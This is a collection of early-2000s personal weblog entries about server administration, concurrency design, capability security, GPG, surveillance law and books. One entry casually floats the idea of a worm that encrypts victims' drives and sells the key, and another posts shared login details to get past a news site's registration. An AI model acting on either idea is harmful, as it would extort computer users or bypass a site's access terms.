Unfortunately, we cannot just add tags or attributes to existing tags without all the validators going nuts. That either leaves trying to get a change through the W3C (ye gods!), overloading some existing operator or hiding it in comments. None of those solutions are much good - anyone have any better ones?

Guess who forgot up actua...

Guess who forgot up actually upload the Syncthread paper. Opps. (Well done to all the people who emailed me about that - that would, erm, be no one despite all the attempts to get it in the logs!)

Stand have announced that the debate over the RIPX order has been delayed until Monday the 24th (not Tuesday the 18th, like /. said - that's when it was going to be). Stand also have a neat little banner ad which is now floated on the top right of IV.

A New Germ Theory [via ES...

A New Germ Theory [via ESR] about how many conditions (such as cancer, heart disease and even homosexuality) are infectous because, if they were genetic, they would be selected against so strongly as to disappear. Well worth the (quite long) read.

What I said this morning (it's just below this - read it first) is backwards. We don't need a way of marking sections as "this stuff is actually someplace else", we need inlink linking (like <img> tags put content inline). This is nothing new - Ted Nelson told us all this years ago.

Very cool CSS [via Keith]...

Very cool CSS [via Keith]. This is pretty much a mozilla only zone, konqueror doesn't stand up to much here, but there are some mangled versions of the pages for IE users. It would be cool to use some of the this kind of CSS on IV - but it would cripple it for most viewers. Having the tree structure as a CSS menu would be so funky I might just do it anyway.

With an eye to some backlinking on IV I tried to find a simple webserver that would log Referrer headers. Apache is far too big to use unless you really have a need for it (PHP etc), thttpd looks just right, but as soon as you switch to logging to a file it doesn't log referrers! Aggh!

In the end it only took about 5 minutes to hackup the One True Webserver to log referrers anyway, so that's what I'm running now

J for C Programers

Four entries today and counting. Partly I'm catching up from when IV was down this week but mostly it's because if I start coding anything I know that will be the afternoon gone and I really should revise Biology

This was posted to LtU this week. I've read about 1/4 of the way through, which covers all the basic ideas in J and the builtin operators.

It's a very interresting language and quite cleanly based around the idea of multi-dimentional arrays for everything. However, like most pure languages its range of applications it quite limited and it also suffers from being in the Perl family of function naming. In fact it's worse than perl in that reguard, J is more like K.

However, I do recommend that people read the beginning of the book and grok the concepts of the language about implicit loops.

More on ANKOS

Keith links to a discussion on A New Kind of Science. Most of the opinions there seem to follow my own quite closly.

For you Mozilla users the...

For you Mozilla users there is now a CSS tree at the top of the root page (in addition to the old-style tree at the bottom). It's a little buggy, sometimes it doesn't seem to fold away right and sometimes moving down to open a different branch changes the tree so that you select something else. It's a start thou

Later On: Removed it - just looks silly in a browser which doesn't support it

Asynchronous Behaviour

Raph and Dave McCusker have been talking a lot about how to design servers recently.

I played around with these ideas a lot during Whiterose development and my views might be a little clouded because Whiterose isn't a typical network server (the Freenet protocol is far more complex than most). During Whiterose development I settled on syncthreading as a good model for managing state. This text gives a good overview of syncthreading (by my definition). It was written as a technical report for Uprizer, but since it says nothing about Uprizer specifically I doubt they have a problem with my making it public

Now, the SEDA people have a good paper with some neat graphs of throughput with threaded and event based models which certainly suggest that no one should consider writing threaded servers if they want it to scale.

However, threaded systems (certainly syncthreaded ones) are event based. They're fundamentally the same thing.

With an event system you loop over your input queue call (be it select, poll, kqueue etc) and, for each event, feed the event into the finite state machine (FSM) for that transaction. The FSM makes some quick, non-blocking, change in its state and returns. Repeat.

The only difference with a threaded model is that the FSM is a stack and some registers. You still feed the event into the FSM and it still returns quickly. If you have syncthreads you are doing this explicitly, otherwise the kernel is doing it for you. (if you don't get what I'm saying here, read the Syncthreading paper and come back).

In an ideal world the FSMs would be fully self contained and so it wouldn't matter if they were updated at the same time (e.g. preemptive threads). Sometimes, however, they have to interact because the protocol requires it. In this case there is a fundamental difference between preemptive threads and most event-based designs.

So, given that one caveat, if you are saying that threaded systems are slower, or have less throughput etc you are really complaining about the quality of your threading system.

Why I support syncthreading

Given that I've just said that syncthreading and event-models are, basically, the same - how can I say I support syncthreading?

Simply because the FSMs are so much nicer to code as threads when they are anything more than the most basic systems. Threading basically loads and saves your state for you (while event models make you update structures manually) and threading lets you have state encoded in the program counter. A linear progression of states is written as a linear progression of statements and loops of states are written as loops in the code. It's just so much easier to work with.

Whee! Imperialviolet.org ...

Whee! Imperialviolet.org lives! Xia went down and looks dead - and it unfortunately hosted the DNS for imperialviolet.org. Much thanks go to Schvin for DNSage from now on. I still have a slight hope of getting netsol to recognise metis as a nameserver thou.

Time has been all taken up by exams, so not much to tell from looking at my bookmarks (which are spanning both monitors again - sure sign that it's time to organise them).

Oh, and the letter I sent to my MP

<AccordionGuy2> "Man in the Middle" -- protocol porn.
<GabeW> leave it to #infoanarchy to turn crypto kinky

When the RIP act was passed...

Oh fuck. When the RIP act was passed dear Mr Straw bleated repeatedly about how careful the control was going to be and how tight the safeguards would be for spying on people. Now what do we have?

"expanded to include seven Whitehall departments, every local authority in the country, NHS bodies in Scotland and Northern Ireland, and 11 other public bodies ranging from the postal services commission to the food standards agency."

The Food Standards Agency?? And this comes as a government aide has to apologise for investigating a member of the Paddington Survivors group because they might be against government policy.

As a first step, your goal, dear reader, is to try and get TLS installed on your MTA today. It's only a small step, but it's pretty simple (qmail, Debian Exim, Exim, Postfix).

Send an email to me (via TLS/SMTP of course) and get your name on a roll call of fame. Guess who's MTA has been TLS enabled for ages?

E7l3 discusses A New Kind...

E7l3 discusses A New Kind of Science today. As I'm a little further into it it has got a lot better - mostly because Wolfram has stopped talking about how wonderful he is.

Lots of new stuff on LtU. When it rains, it pours (certainly true of the weather today)

Seattle Times article [via Bram] talking about how `public domain' means almost nothing in US legal terms and a little about BitTorrent.

Old Story about Australia abusing spying powers. More reason why people should be very worried about what Europol wants to spy on (mentioned here before).

Like I said, a lot of projects are long term solutions to this and, in thinking about it, I must admit that I keep designing some manic things. (I'm not ready to throw them out yet). As a start I'm looking at overlay networks and the performance of TCP over different connections with a view to creating a Crowds like network. While I'm at it, it would be nice if the overlay network could make NATed and firewalled hosts first-class peers.

In order to play about with TCP I've setup a quick program that uses the tun/tap device to simulate a link with a given bandwidth, latency and packet loss. I might post the results here if there's anything worth noting.

However, exams are taking first place in my scheduling now

On Computers and the Evil...

On Computers and the Evils Of Powersaving

Went into school yesterday to startup everything and to fit a UPS on metis. Unfortunately I didn't compile the kernel with serial support (minimal and all that) so I'll have to reboot metis on Monday with a newer kernel. Good excuse to switch to 2.4.18 thou.

I also took marvin (the laptop) in with me and let it feed off the 2Mbps connection. It's now a fully up to date Debian unstable with 2.4.18 etc. I also finally got both my PCMCIA cards working. The 3Com network card was fine under 2.2.17, but the Aironet didn't work at all.

In comes 2.4 and both of them break. It turns out that the 3c575 driver has been replaced with 3c59x which has hotplug support (meaning it can handle the PCMCIA card without cardmgr or any of the rest of the pcmcia-cs tools). The airo drivers, however, do need pcmcia-cs and only the latest will do. Anyway - it's all working now.

Since I have an Aironet but no other 802.11b devices I set ethereal sniffing wifi0 and walked into town to pickup a book (more on that later). The Aironet is, as I understand, the best card for sniffing since it can do RFMON (multiple frequency sniffing I think). But the laptop went into power saving (which I expected) and powered down the PCMCIA bus too (which I didn't), so I got nil packets. Oh well.

A New Kind of Science

The book I was picking up was A New Kind of Science, which has finally reached this country. And thanks to Anna Gregson who came up to me in town and just gave me 30 pounds, thus neatly paying for nearly all of the book. I wish more stunning ladies would do stuff like that

I've only read the first couple of chapters but so far Wolfram is being a pompous twit. He spends a lot of words talking about how he is the first person to recognise that complexity can come from simple structures and how he is the first person to study it.

Doesn't exactly ring true does it?

I think, Stephen, that most people has realised that long ago. Certainly people who had looked at crypto. I mean, it's spelt out word for word in Cryptonomicon (the chapter about LPW and organ). LFSRs were the mainstay of military crypto for years and were very well studied. Maybe I'll think more highly of this book as I get more into it.

The Beauty of Fonts

This [via Raph] is a good discussion of why so much has been said about unhinted AA recently. Just look at Chimera - that's nice. Unfortunately, since I run Xinerama I can't have XRENDER as well, at least in 4.1.0. Maybe 4.2.0 will fix it, but Debian doesn't have it yet (thou I note that Gentoo does).

(as an aside, Freetype have a cool new, fontish, logo)

CSS

As a rule of thumb - if it isn't broken in konqueror then I don't know about it. Pill pointed out that Mozilla (and other Gecko based browsers) didn't like the CSS because publicfile was returning the MIME type as text/plain. Fixed that in a very DJB way, the name of the CSS file is now iv.css.text=css.

Well, IV is still down as...

Well, IV is still down as I write this, but I'm bringing it up tomorrow and taking my laptop to it's 2Mbps connection to download some stuff. Upgrading Debian for one (so I can drive my Aironet card) and I'll try to download this. It's a 143MB (5 hour) MP3 of someone called Zigmund Void. The first bit sounds weird (I wondered if the file was corrupt) but nym ensures me it's quite good.

Although a perfectly good day, I'm a little down. Firstly Zooko's hard drive died and took many unfinished papers and films of Irby with it. In the future I guess he'll backup, but there's something heart tearing about data loss like that. Maybe it's a sign of geekyness that I get upset by that. He's saving up to send it to DriveSavers but they cost lots. (you can always tell that if they don't have prices on the website then the cost is too high).

And for those unconcerned about the loss of millions of poor bits, then this made things worse. It's a record of what Europol wants to log given their new powers which I noted here before.

We need a short term solution to this problem (other than cutting these people up into lots of little pieces). Freenet/MNet and other such networks are long term and systems like Mixmaster are too difficult for most people. I don't know how much confidence I have given that most people seemingly couldn't care less but maybe something like Crowds (but with IRC and email etc too) would be ok.

I guess I'm more than a little depressed about human nature too. I have some thoughts about event-models and the like, but I don't feel like writing them up now

Imperialviolet will be do...

Imperialviolet will be down from sometime like 3AM BST tomorrow until BST morning Friday

It seems that

When I subscribe to mailings lists I use a lists.something@imperialviolet.org address so that if that email address ever gets used for spam I can subcribe under another address and direct all mail to the old address into /dev/null

Unfortunately, this interacts badly with mailing lists which (resonably) require that the sender be a list subscriber. Good old mutt has send_hook commands in its config file which change the From address quite nicely.

That doesn't, however, change the envelope sender, but a quick look at the qmail-inject manpages shows that setting the Return-Path header will do that fine. Unfortunately, mutt strips Return-Path headers before sending (set one in a message, send it and then look at it in your outbox - it's gone). After grepping the mutt source and sending many test messages, deltab finially sorted it out - put set envelope_from in your .muttrc and all is solved. Thanks to all the #infoanarchy people who helped. (I'm just blogging this to help others and because I know I'll need it again at some point in the future)

Still reading Structure and Interpretation of Computer Programs and have just finished Garden of Rama (AC Clarke and Gentry Lee). It's pretty cool scifi - not hard scifi nor stunning - but a good read.

Software Fault Prevention by Language Choice...

Software Fault Prevention by Language Choice: Why C is Not my Favourite Language [via DNM]

The following is a result of an IRC conversation with Zooko and tvoj and may well only make sense if one was a part of that conversation

This article (from the E homepage) suggests that capability systems cannot stop communicating conspirators. I think that either the author of that (MarkM?) or myself are misunderstanding something here. Capabilities can stop communicating conspirators (I'll show that in a sec) - but part of the situation definition in the article is "Bob may also communicate with Mallet" - which is a different problem. The article is, I think, talking about the following situation:

A has a capability cap and can communicate with B. A and B wish for B to be able to use cap but A cannot transfer cap to B

In that situation A can proxy requests for B and in that way B can use cap

Now, there is a separate discussion about a different situation. I think we were confusing the two last night. The situation this time seems to me to be:

A has access to secret information and wishes to communicate/leak this to B. The capability system seeks to prevent this

Now I think that a capability system can ensure this. Proof by induction: Suppose for a moment that A and B have no capabilities. Thus they cannot do anything at all and so cannot communicate. If you only give them access to objects that do not allow communication then neither can communicate.

The problem is that the number of objects which do not allow communication is small and it's hard to find them. (I should mention at this point that this is a problem that Multics tried to solve - interested parties should Google for some papers from that).

If we give A and B access to integers and simple operations (add, multiply, divide) then they can perform simple tasks and still not communicate - even if we give them capabilities to the same integer objects. Integers are environment free - they have no state. An object which is environment free is also side-effect free and deterministic (the result only depends on the inputs). You can also think as side-effect free as does not write to to environment and deterministic as does not read the environment. In the following I mean deterministic (D) to mean mearly deterministic, the same for side-effect free (SEF)

Of course such properties only hold if the inputs are at least as strong. For example if you pass a deterministic object to an environment free function, then that function may set some global variable through the input.

To stop A and B communicating you must stop their environments from touching. You can give them EF objects with no problem. You can give them EF and SEF objects with no problem, same for EF and D objects. However, as soon as they have SEF and D objects you may have a problem as the D objects could write to something which the SEF objects could read.

Now, if A and B are running on the same computer then they share objects like the CPU. Give B a clock and they can communicate via the lengths of time-slices etc. Give them the ability to malloc and they may be able to communicate via the VM etc. This is why it's such a hard problem.

I got Amphetadesk working...

I got Amphetadesk working by sending the Perl libs it couldn't find to the apt bot on #debian and installing the packages it said. Only worked for 0.91 thou. At least I know that my RSS feed works.

TBL (not, Tim Berners Lee, another one - who is, I think, the smartest person I've ever met) recommended The Structure and Interpretation of Computer Programs a while back. Well, I found it online (legally) today, via this page. Reading it on my laptop now.

This is very sweet

Android Generated for Gratification and Logical Exploration

ESR has a weblog! (and it's pretty good). A bit gun mad, but that's always been a problem with Eric

Suggested reading: Notes ...

Suggested reading: Notes from the BPDG (fuckware) meeting, BBC article about the new EUP rules on data protection and privacy, Another BBC article about the large fall in street crime in Lambeth (following a relaxing of cannabis laws)

A little while ago, it was found that irssi was backdoored at the source level (someone cracked server and altered the source). Now it's been found that fragrouter suffered the same thing (search BUGTRAQ archives). Two points from this: in the short term we need a little more crypto and in the longer term we need to fix the god-awful UNIX security model.

Irssi has started signing releases at least, but personally I still can't believe that Debian doesn't. It's really not rocket-science and the code support is there (deb-sigs). The general argument is that the number of Debian developers means there are too many keys that could be compromised. Guess what? It's still better than nothing. (As an aside, Debian still doesn't have incremental updates to the Packages file - Debian sucks in too many ways).

In the long term we need to do something about the UNIX security model. The research has been done - that isn't a problem. But I'm lazy. I might quite like to play with more secure systems, but they are marked out by being unusable. Of course, I'm not working to create an EROS distribution or anything so I don't really have the right to complain. Maybe something like this [via Wes] will stay us in the short term.

This looks like a cool re...

This looks like a cool resource for optimising PHP. I haven't done any PHP for a while thou

Be sure to checkout the links from Zooko's weblog for 5/27.

Picked up my photos from the school prom today and scanned them in. My scanner is pretty rubbish. People usually look pretty bad in photos, and after I've scanned them, they look even worse . Anyway, they're here

This link was mentioned on infoanarchy on why ATM is a bad idea. I don't really know much about this, but it seems pretty persuasive. Then again, if I had so much money I could even consider an ATM network I would be pretty happy!

Dan Moniz pointed out that...

Dan Moniz pointed out that I've been a total id10t and linked to sweetcode.com, not .org, which is why it's been saying "For Demos". Stupid me.

IV also has an RSS feed now

Also, thanks to Pill for pointing out that mozilla was rendering link borders around the permalink images and for giving the CSS code to fix it. (IMG { border : 0 none; }, BTW)

IV now has permanent URLs...

IV now has permanent URLs for each entry into the archives for anyone who wants to link to a specific entry. Copy the link from the to the left of the time lines

This is getting silly - caffinated soap for a wake up in the shower. About 250 milligrams of caffeine per shower is absorbed through the skin. weird.

Projected deaths in a Kashmir nuclear war. Newscientist is broken with most browsers (it returns a "unavailable at the current time" page). Faking the User-Agent seems to do the trick

This paper has been doing the rounds (thanks to tav on #esp for the link). Kindof scary what a determined idiot could manage to do. So who's going to write a worm which uses stealth-spreading and strikes, encrypting all the hard drives of computers it infected? How much do you think you could sell the key for? (credit to Ian for that idea)

It seems that NASA is set on a manned mission to Mars after the discovery of millions of tonnes of ice just a meter under the surface.

So is NASA going to give up on the ISS and try to capture the nation's imagination (and wallets) with the first manned mission to anywhere since the Moon? The ISS has cost $40 billion so far (it should have cost $8 billion and been finished in 1992) and there's no end in sight. The Russians don't have the money, NASA is practically bankrupt after bad accounting practices were revealed in June 2001 and the other members (European, Canadian and Japanese space agencies) are fed up with the whole project.

Goldin (who ran NASA throughout the 90s) said NASA was going to be "Faster, better, cheaper" after the loss of the $1 billion Mars Observer. Wouldn't the faster, better, cheaper option be another unmanned mission? It doesn't have the glamour, but you have to question the reasons why NASA is doing this. Science or PR?. What does a manned mission offer?

BBC piece about the EU En...

BBC piece about the EU Enforcement Directive (an addition to the copyright directive). What they want this time seems to be that all CD/DVD presses put ID numbers on CDs and more powers to search.

AaronSw is pissed with the W3C

BBC News article about the water on Mars that I would have linked to had I had it around earlier

And an article about NASAs money problems (SciAm).

Essential Blogging by O'R...

Essential Blogging by O'Reilly is in draft form for download (ZIP file of PDFs). Deals with using common blogging tools and a little about blogging community. Worth a skim even if you blog with XHTML and a few custom Python scripts like me

This is quite a neat little utility for modern IDE drives. It uses the SMART interface to read the temperature sensor and spits the value back out. I didn't even know IDE drives *had* temperature sensors built in.

I'm not sure what's going on with Sweetcode. It just reads "For Demos" and has done for quite some time. Noone seems to know what Demos is (other than the plural of demo).

Two of my four SCSI drives seem to fail to startup until they've been on for a few minutes. I'm pretty sure it's not the drives (since it's two of them at exactly the same time). I'm thinking maybe I shouldn't have used a cable from the "SCSI Bucket of Bits" from work.

From Ian:Actually, this i...

From Ian:

Actually, this is my assessment too - I have been saying for a while that Quantum Computers will cause us to revert to a situation where secure practical crypto was the exclusive preserve of the wealthy and powerful (ie. those that can afford Quantum Crypto).

Perhaps you should email Mr Singh and ask his opinion of it.

I will

Another Paul Graham link

School's out for ... ever...

School's out for ... ever

Scary

Ok, I've improved the IV ...

Ok, I've improved the IV generating scripts to break up blog entries into 10 on the front page and a series of archive pages (20 entries each). You can access the archives from links at the bottom of every page.

I went to a talk by Simon Singh (author of The Code Book) on Wednesday (part of the Cheltenham Science Festival). It was a crypto talk (nothing I didn't know already really, but very well done and with a real live demo of an Enigma) during which he went through the solutions some of the 10 challenges he sets at the end of The Code Book. Nothing remarkable here except that he admitted that the toughest code to crack (RSA wrapping 3DES) was done wrong. Rather than Enc1Dec2Enc1 he did Enc1Dec1Enc2 - which is just the same as single DES. Implimentation issues again.

But the part that got me thinking was a little aside when he said that Quantum computers might cripple factoring schemes, but that's ok because we have Quantum crypto. Now I need to go lookup exactly what algorithms exist for QCs - but if we assume that it breaks all pubkey systems we know then Quantum crypto doesn't replace current crypto at all. It requires a direct fibre link in order to preserve the all important quantum states of the photons. This puts us back to the days where very few people have crypto (those who can afford direct fibre links between themselves) - a major step back.

It would be a sorry state is this happened - someone please reassure me that it wont.

From pupok:I realised rec...

From pupok:

I realised recently that people from the UK have a different sense of what things are appropriate to talk about publicly. It is extremely well-defined. I do not possess it at all,

Really? I don't even notice it. I guess IV is very non-personal and I would feel awkward about posting some things here. But there is a little of that good old Bristish stiff-upper-lip around - but very little

I'm not sure about this site yet. Looks very complete and well designed but I haven't really had a chance to read much of the content yet. Doesn't really matter if someone pulls off a singularity

Landscape page updated. Metis was down for a while today since the IP address jumped (again!). Damm Telewest keep on telling us that it's static. They now say, however, that it really will be after maybe one more jump. Wonderful

Followup to Paul Graham's Revenge of the Nerds, here. Thanks to AccordionGuy.

<AccordionGuy> The next plan of course, if for Chancellor Grahamtime to propose creating an army of the Republic to crush the separatists.
<agl> if he does, then at least we get a cool film out of it :)
<agl> does Dennis Ritchie play Yoda then?
<rik> agl: "Yes. The C is strong with this one."
<coderman> i cast my vote for Bjarne as Count Dooku
<rik> "Edit code in vim he does. Mmm."
<AccordionGuy> a.k.a. Darth Templatus.
<AccordionGuy> Count Do-Loop.
<AccordionGuy> Who are Anakin and Padme, then?
<Loki> paul vixie and the chick at the head of RIPE, forget her name.
<AccordionGuy> If either Kemeny or Kurtz (BASIC) were still alive, they could play Jar Jar.
<AccordionGuy> I vote for Larry Wall and Guido van Rossum as C-3P0 and R2-D2.
<coderman> lol
<JDarcy> RMS as J. Random Ewok
<coderman> RMS looks like an ewok. sorta
<AccordionGuy> I was thinking of RMS as Dex, the greasy spook cook. They look like they have the same hygiene habits.
<AccordionGuy> I was thinking James Gosling as Jabba, since we already call Java "Jabba" on this channel.
<AccordionGuy> "Hoh, hoh, hoh, anonymous inner classes are my kind of scum."
<AccordionGuy> Cobol would be poor old Chancellor Valourum, who got ousted in Episode I.

Downtime: Metis (and thus...

Downtime: Metis (and thus IV) will be down from early June 5th for about 2.5 days while the language center is wired up at school. Zooko has very kindly offered to be backup MX during this time

Today was the last semi normal school day. I'm not in tomorrow, I have exams all Thursday and Friday will just be wild. Biology practical went fine this morning (even though the exam board contacted school yesterday and told them that the experiment doesn't actually work and to just give us the results). It feels very weird to be finishing school - I can't remember not going to school. Feeling displaced

I've written up the starting notes on Landscape. It's just a bitch about the importance of IDEs at the moment - not even sure if I want people reading it yet. I guess my main point about IDEs is separate at the moment and not clouded by and sketches of LS proper yet

A new addition to the Common Links: E7L3. My common links are so incomplete at the moment but it's fascinating to see social webs in action. With blogs you can actually see the arcs of similar interrest. Now I want a tool that gathers recent blog entries and cross links them by keywords. Answers on an email to agl@imperialviolet.org. (I know IV is guilty of not having an XML version - I will fix this at some point

New article from Paul Gra...

New article from Paul Graham

This site runs some pretty sweet music in MP3 format (thank god it's not all RealMedia or WinMedia)

Following a link from JWZs weblog to here which has lots of really neat stuff on fractals and the like

Joey on Attack of the Clones...

Joey on Attack of the Clones (which I watched yesterday). The love scenes are, quite frankly, pants and if I had been editing it most of them would have been left where they belong (on the cutting room floor). However there is more then enough action to make up for it and Yoda with a lightsaber is worth the ticket alone!. Go see it.

Aaron has posted an annotated ETCon programme with links to the blogs which covered each session.

Wolfram's book is out (and my order is lodged with Waterstones). Wired have some good, extensive coverage. But, unfortunately, it doesn't look like Wolfram Research Europe are getting any copies until the end of the month, so god knows when I'll get mine.

I've now taken to leaving notes for myself in root.inc (the file which generates this page) and it works pretty well

Don't you just wish you h...

Don't you just wish you had a digital camera which could take pictures like this or this?. That could almost be rendered - ouch. (bigger versions for those on better connection, play with the URL to get 1024x768 and 2272x1704).

Frost looks like a very interesting extension to C++ (it's not general as far as I know, only for G++). It allows multimethod dispatch with syntax like:

void func (virtual wibble & arg) { do_something_to_wibble_objects (arg);}

Just great. Go read it.

Some good procmail rules for filtering spam out (works really well for me)

:0
* Subject: ADV:.*
spam

:0
* Subject: .*\.\.\.\.\.\.\.\.\.\.*
spam

:0
* Content-Type: .*charset="ks_c
spam

:0
* Content-Type: .*EUC-KR
spam

Ah, at last. Maybe something...

Ah, at last. Maybe something which can explain what the hell Aspect Programming is (I expect I'll be disappointed).

GCC 3.1 is out (changelog). And they have a MMIX backend! Woohoo, now all I need is a JIT compiler to translate MMIX into IA32 to run it

An article on arch (the CVS replacement)

About 6 people have put their keys through the verifier and it seems to be working pretty well now that I've hacked the GPG source to stop it asking questions. GPG is a total bitch to interface with - we need 1.1 with the g10 library.

Well, I now have 4 of the...

Well, I now have 4 of the 5 aforementioned SCSI drives in a RAID 0 array (I can't fit all the drives in the case). Nice to see my PSU didn't melt and it's pretty sweet speed-wise. You mke2fs and the count shoots up to about 120 right away. Then all the drive LEDs light up and the room shakes for couple of seconds before the mke2fs finishes

Another Lisp Love story

Five Little Languages and How They Grew

NYTimes story about how a company is buying out a whole town (for 20 million dollars) in order to stop the people sueing them over pollution. (registration required for NYT - try user:strsnyt, Password:strsnyt). You gotta love the American disregard for the enviroment. Five percent of the world's population and 25 percent of the pollution.

New articles on SciAm

New project time! A big w...

New project time! A big welcome to the key verifier. As much as we would like the web of trust of GPG keys to work, most people don't know enough people who use GPG for it to work. So as a little helper (and a pretty small one at that) the key verifier will sign your key once you've proved you control the email address in the UID. Thanks to AaronSw and Ian for testing it out.

Introduction to the Semantic Web. It would be nice if this works. At least the SW people realise that they are never going to create a pretty system if it's going to be worldwide, I only worry that because they're aiming pretty low, they are going to hit far too low. Time will tell.

JWZ has a new weblog. For those who don't know, JWZ is famous for lots of things: writing xscreensaver, working at Netscape/Mozilla for a while, owning the DNA lounge and (most of all) for ranting

USENIX2001 report. Ok, so it's from last year - doesn't mean it's not interesting thou! (from Lambda).

I was looking about for places to take me on for the summer yesterday. (It's stunning how disinterested people suddenly become when you mention internship). On the top of my (remaining) list was a company called Innovative Software which I was going to call today. And guess what the headline on the local paper is?? Microsoft sues Chelt Computer Company. I guess there's a chance they might be looking for a Linux knowing intern now - but more likely they are just going to get swatted.

Matrox's new card is out. Drooooool.

One virus has infected an...

One virus has infected another. Namely CIH and Klez to make a fast spreading, nasty payload virus.

Befunge is a language with a 2D `memory' and the IP advanced in 1 of four directions. Crumbs

Nice is the nicest (no pun) Java based language I've seen in a long time. It uses an ML type system (pretty much the best one around) and compiles to Java byte code. Very, very sweet. Need to play with this a bit.

Debian finally has GNUPG 1.0.7! All apt-get

Details of the new Matrox card are surfacing (also see /.). I still very happy with my G400. In other aggle hardware news, I've not got an SLI MegaRAID SCSI controller and 5 9GB UW3SCSI drives to make a nice RAID array with. I just need a SCSI cable with enough connectors and a power supply which won't melt now.

A video of a Lisp Machine in action. I'll have to download this at school as it's a little big. Lisp machines were waaay cool thou.

Imperialviolet's DNS has ...

Imperialviolet's DNS has been upset for the last couple of days as netsol get off their fat arses and update stuff. DNS sucks. I might design a replacement.

I'll catch up tomorrow evening with posting stuff

GZigZag has renamed itsel...

GZigZag has renamed itself to GZZ and moved to Savannah (from SourceForge). GZZ is a free, java implementation of Tel Nelson's ZigZag. It's a neat idea and something like it plays a large part in my plans for total world domination.

Ian has an article on CNet about Freenet and Sept 11th. It's worth a read, or at least a skim

The Mouse Genome is now online if the like that sort of thing. And (better yet) it looks like it's free (in both speech and beer). BBC article

Maybe I should see a doctor about my nosebleeds. They don't happen often, but when they do - boy does it bleed. At least I didn't pass out this time.

Metis now has a TLS (the protocol formally known as SSL) enabled MTA

Roger Dingledine has rele...

Roger Dingledine has released the first draft of the Mixminion design paper. Remix is pretty much dead as the only reason I started writing it was to try my hand at RSA coding - so go read it and pass comment. Maybe when exams are over I'll help with Mixminion because, let's face it, Mixmaster is getting a little long in the tooth.

IV now validates as XHTML...

IV now validates as XHTML 1.0 Strict! (well, the front page at least). The W3C validator sometimes needs a few refreshes to connect to IV thou.

Wes has a link to this interesting page on XHTML+MathML+SVG. Maybe this could actually be a decent typesetting system.

Just finished Diaspora by...

Just finished Diaspora by Greg Egan - wow. The scope of this book is stunning as is the authors grasp of maths and physics. How many other authors explain all the reasoning behind their ideas?.

After about 4 weeks tryin...

After about 4 weeks trying, Smiths have given up and said that the new True Names book is out of print, despite that fact that it was published in December 2001! This is a sucky country to get books in

Some links:

If anyone knows Aspect Orientated Programming I want them to email me an example of why I would want to use it. (you know, like the example of GUI's which is always used for OOP).

Stackless Python (whichI'...

Stackless Python (which I'm sure I've mentioned here before) is moving towards a Limbo [1, 2, 3] model of microthreads.

Maybe an interesting book: IA-64 Linux Kernel

Wolfram's book of about 10 years is coming out soon (May 14 so says the website - but that might slip).

Kotako is being dehosted ...

Kotako is being dehosted as of June 1st after years of fine service (kotako runs linuxpower.org). So I'm moving my mail to imperialviolet.org - which involves re-subscribing to far too many mailing lists - but I'm getting there. Maybe I can get linuxpower.org's MX pointed to mail.imperialviolet.org so I can run a forwarding service for a while.

This was posted to Slashdot - but I don't care I'm going to post it here too because it's a really great list of major software bugs. It's nearly all `physical effect' bugs thou (for example it doesn't count things like the Ping Of Death). Funny reading - if a little scary

I think I've got a decent grip on Garbage Collectors now and damm, it's a nasty problem. I have a few design ideas which I should write up at some point.

The Bloody Sunday Inquiry has demanded that two Channel 4 journalists reveal anonymous sources, on pain of contempt of count. Quite frankly I don't see any way that you couldn't hold such a court in anything but contempt. If the sources had not been granted anonymity then they would never have said anything - the inquiry should be grateful for what they have. Forcing disclosure will only damage future inquiries and alienate people against this one. At least the two reporters have refused for the moment.( Guardian story with some great quotes from the reporters).

Another good story (and another link to the Guardian). I wonder if you could retrofit a computer to a car (a proper computer) and live your whole life in a car? Drive-thru everything, wireless internet access, a postal box to get your internet ordered stuff delivered (it would have to be drive thou of course). You would be the totally mobile citizen, telecommuting and living out of your car. The only problem I can't work round (reasonably) is toilet stops. But I suppose you could have a toilet fitted and store the waste somewhere in the car until you find a place to, erm, dispose of it.

I'm sure people have seen Jamie Kellner's `views' on PVRs. If not - see the Slashdot story. Comments about the stupidity of this guy aside (and I loved Ian's Tivo) it seems to me this is an example of the Tragedy of the Commons. As long as people watch adverts on TV (actually, for as long as marketing people think they do) - everyone gets free content. However, some people can skip the adverts (either by not watching or by using PVRs) and get free content without suffering the adverts. And let's face it - nearly all adverts are just painful. This works until too many people do it and marketing people realise that ads don't work and so people have to pay for content.

Now, I really don't want to be seen to be agreeing that "PVR Users Are Thieves" (because I'm not) - but it looks like the current system is fundamentally unstable and will fall at some point. Now the thing not to do is to try to pin reality somewhere it doesn't want to be with laws and fuckware which force people to watch adverts (HDTV and the like). One point where the link with the T of the C fails is that in true T of the C situations everyone is worse off afterwards. I don't see that this is true in this case. I wouldn't have a problem paying for what little TV I watch if it were advert free (assuming a decent micropayments system).

But then people will be trading DivX's of shows and they'll still be bleating about users being thieves. And you can bet they'll still be trying to pin reality with laws and fuckware. Sigh.

Paradigms of AI Programming

Woody not going to make release tomorrow. (but who doesn't track unstable anyway??)

A Retrospective on Paradigms of AI Programming has been updated

I'm reading up on Garbage Collection at the moment. Microsoft's .NET GC implements the write barrier my watching for dirty pages - but that gives 4K granularity, which is pretty poor. But the thought of a write barrier in the code at every pointer write isn't exactly nice either.

More on the EUCD (DMCA for the EU). Does anyone else feel political jetlag? I thought you had to be older for that to set in. Maybe we should abolish politicians (I don't think I actually agree with that page thou).

And here's today's (badly spelt and lacking grammar) message from our sponsors:

it's official Linux is pant s cause it doesn't support all of the messenger icons - go out and buy up xp all u linuxites" - will merrett CEO of willmerrett corporation the biggest company worldwide by 2020 and runnin on windows!

Google has launched a new...

Google has launched a new service in beta (requires HTTPS)

Currently nostalgia tripping on New Order - Shellshock and Screenwriter's Blues (finally found MP3s of them, lyrics for SB at the bottom of the page)

CERT working with a new language for doing simulations of complex systems [Link has broken since then]

And today's random link is this

Well, I take it back abou...

Well, I take it back about Kompessor after Zooko pointed me to some of her better works (namely Attack and Release and Never Talk to Strangers).

I read this in the latest issue of New Scientist:

The depression had hit, and the town had thousands out of work and little money in the municipal coffers. So the mayor printed his own. The value of the Worgl "stamp scrip" was set to automatically depreciate: this is, it earned negative interest.Once a month, its holders had to pay a "stamp" fee of 1 per cent of the value of the note. The result was that everyone spend the new money in the town as fast as possible. The streets were re-paved, the water system rebuilt, new houses appeared, then a ski jump, a new bridge. Some 200 other Austrian towns came up with plans to copy it, the central bank panicked, and it became a criminal offence to issue currency.

That's pretty stunning. I always wondered what the basis of the fiscal system was - thinking it must be pretty stunningly complex and well thought out. I'm pretty much of the opinion that it's not thought out at all and just works because of luck and is designed by powerful conservative, neophobic organisations.

Some other links which mention this story:

